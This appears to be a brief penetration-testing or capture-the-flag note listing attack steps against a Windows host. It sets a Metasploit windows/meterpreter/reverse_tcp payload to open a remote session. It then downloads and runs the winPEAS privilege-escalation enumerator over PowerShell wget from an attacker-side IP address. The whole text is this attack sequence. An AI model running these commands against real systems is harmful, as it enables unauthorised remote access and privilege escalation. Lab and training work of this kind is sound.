> set payload windows/meterpreter/reverse_tcp
> set lhost and lport
> run (we will get a meterpreter session)
> upload winpeas in cmd via the python server
> powershell.exe wget http://192.168.132.142:80/winPEASx64.exe -o winPEASx64.exe
> winPEASx64.exe